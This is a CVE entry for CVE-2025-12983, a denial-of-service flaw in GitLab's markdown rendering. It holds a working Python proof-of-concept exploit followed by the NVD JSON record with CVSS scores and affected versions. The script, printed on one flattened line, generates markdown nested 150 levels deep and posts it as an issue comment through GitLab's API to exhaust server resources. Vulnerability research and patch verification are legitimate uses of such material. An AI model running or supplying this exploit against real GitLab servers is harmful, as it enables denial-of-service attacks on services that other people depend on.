CVE-2025-12983

#!/usr/bin/env python3 # CVE-2025-12983 PoC - GitLab Markdown Nested Formatting DoS # This PoC generates a crafted markdown payload with nested formatting patterns # that can cause denial of service when rendered by GitLab. import requests import sys def generate_nested_markdown(depth=100): """ Generate nested markdown content to trigger DoS. The nesting creates exponential parsing complexity. """ # Create deeply nested formatting patterns payload = "test" for i in range(depth): payload = f"**{payload}**" # Wrap in various formatting combinations final_payload = f"""**__~~{payload}~~__** [{payload}](https://example.com) `{payload}` > {payload} - {payload} """ return final_payload def exploit_gitlab(target_url, token, issue_id): """ Submit crafted markdown to GitLab issue to trigger DoS. Args: target_url: Base URL of GitLab instance token: GitLab personal access token issue_id: Target issue ID to post comment """ headers = { "PRIVATE-TOKEN": token, "Content-Type": "application/json" } # Generate the malicious payload markdown_content = generate_nested_markdown(depth=150) # Post as comment to trigger markdown rendering comment_data = { "body": markdown_content } api_url = f"{target_url}/api/v4/issues/{issue_id}/notes" try: response = requests.post(api_url, json=comment_data, headers=headers) if response.status_code == 201: print("[+] Malicious markdown submitted successfully!") print("[*] GitLab server will consume resources parsing nested patterns") return True else: print(f"[-] Failed to submit: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <gitlab_url> <token> <issue_id>") print("Example: python3 poc.py https://gitlab.example.com glpat-xxxx 123") sys.exit(1) target = sys.argv[1] token = sys.argv[2] issue = sys.argv[3] exploit_gitlab(target, token, issue)

{"cve": {"id": "CVE-2025-12983", "sourceIdentifier": "[email protected]", "published": "2025-11-15T09:15:41.950", "lastModified": "2025-11-19T19:44:25.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated attacker to cause a denial of service condition by submitting specially crafted markdown content with nested formatting patterns."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:L", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "16.9.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "B097C4A0-D3E7-4EE7-8533-30CE2CC51381"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "16.9.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "3073B463-3C6C-456E-8EC6-6E1CA4B3489C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "36824F52-C9A0-4FB3-91F3-05593E3551E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "6D0A238D-1278-4D05-86F5-4C323E0CFE36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "7E85D20B-EEE1-4CC9-B50A-4040972287D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "B2A3A57F-C750-4C92-8C2B-C5FCF1D70F4F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/296257", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3419588", "source": "[email protected]", "tags": ["Permissions Required"]}]}}